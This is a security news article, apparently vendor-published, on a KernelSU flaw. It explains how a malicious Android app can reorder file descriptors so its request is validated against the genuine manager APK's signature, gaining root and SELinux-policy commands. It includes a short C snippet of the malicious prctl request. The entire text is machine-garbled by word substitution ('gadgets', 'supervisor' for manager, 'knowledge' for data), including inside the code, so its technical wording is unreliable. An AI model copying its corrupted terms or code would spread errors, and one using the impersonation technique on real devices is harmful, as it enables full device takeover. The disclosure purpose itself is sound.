A essential safety vulnerability found in well-liked Android rooting frameworks might enable malicious functions to fully compromise rooted gadgets, giving attackers full system management with out consumer information.
The vulnerability, first recognized in KernelSU model 0.5.7, demonstrates how seemingly strong authentication mechanisms will be circumvented by intelligent exploitation methods.
Rooting frameworks like KernelSU, APatch, SKRoot, and Magisk have gained widespread adoption amongst Android customers looking for administrative privileges on their gadgets.
These instruments function by patching the Android kernel and hooking into essential system features, creating communication channels between kernel house and consumer functions.
Nonetheless, this deep system integration comes with important safety dangers, notably when authentication mechanisms fail to adequately confirm the legitimacy of requesting functions.
The vulnerability exploits a elementary weak spot in how KernelSU authenticates supervisor functions.
When an utility requests supervisor privileges by the prctl system name utilizing the magic worth 0xDEADBEEF, the framework performs three verification checks: validating the supplied knowledge listing path, confirming listing possession, and verifying the APK’s digital signature.
Whereas the primary two checks are simply bypassed by any malicious utility, the signature verification course of accommodates a essential flaw that may be exploited.
Zimperium researchers recognized that KernelSU’s signature verification depends on scanning the method’s file descriptor desk for the primary file matching the sample /knowledge/app/*/base.apk.
This method assumes the found APK belongs to the requesting utility, however attackers can manipulate file descriptor ordering to trick the system into validating the authentic supervisor’s signature as a substitute of their very own malicious APK.
Superior File Descriptor Manipulation Assault
The exploitation approach facilities on refined file descriptor manipulation that enables malicious functions to impersonate authentic KernelSU managers.
Attackers accomplish this by bundling the official KernelSU supervisor APK inside their malicious utility and strategically opening it earlier than making authentication requests to the kernel.
The assault sequence begins with the malicious utility figuring out its personal base.apk file descriptor and finding a lower-numbered descriptor. If none exists, the attacker closes stdin (file descriptor 0) to create house.
The applying then opens the bundled authentic KernelSU supervisor APK, sometimes positioned within the lib listing at a path like /knowledge/app//.com.attacker.supervisor/lib//base.apk. This path satisfies KernelSU’s filtering standards whereas containing the genuine signature.
// Malicious authentication request
const char* data_path = “/knowledge/knowledge/com.attacker.supervisor”;
int32_t end result = -1;
prctl(KERNEL_SU_OPTION, CMD_BECOME_MANAGER, data_path, nullptr, &end result);
When KernelSU performs signature verification, it discovers the authentic supervisor’s APK first within the file descriptor desk and validates its signature, unknowingly granting supervisor privileges to the malicious utility.
As soon as authenticated, the attacker beneficial properties entry to highly effective instructions together with CMD_GRANT_ROOT, CMD_ALLOW_SU, and CMD_SET_SEPOLICY, successfully reaching full system compromise.
The vulnerability’s affect extends past particular person gadgets to enterprise environments the place rooted gadgets pose important safety dangers.
Organizations utilizing cellular machine administration options should implement complete detection mechanisms to establish rooting instruments and stop potential exploitation of those essential vulnerabilities earlier than they result in knowledge breaches or unauthorized system entry.
Increase your SOC and assist your staff shield your enterprise with free top-notch menace intelligence: Request TI Lookup Premium Trial.
